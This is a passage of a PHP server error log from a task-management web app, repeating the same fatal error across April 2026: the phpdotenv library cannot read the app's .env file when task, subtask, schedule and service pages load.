/home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 15:23:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 15:23:30 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 15:23:34 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 15:23:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 20:44:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 20:45:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 04:33:54 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 04:42:49 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:09:29 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:10:04 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:38:07 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:38:26 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:41:41 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:41:42 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:41:43 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:42:16 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:42:25 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:43:22 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:43:44 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:09:38 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:09:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:23:01 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:24:05 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:24:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:24:18 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:24:23 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:25:04 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:26:29 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:53:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:54:44 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:54:52 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:56:07 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 13:37:43 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 14:22:57 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 15:09:57 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 09:06:46 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 09:10:45 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 09:10:51 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 09:18:19 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 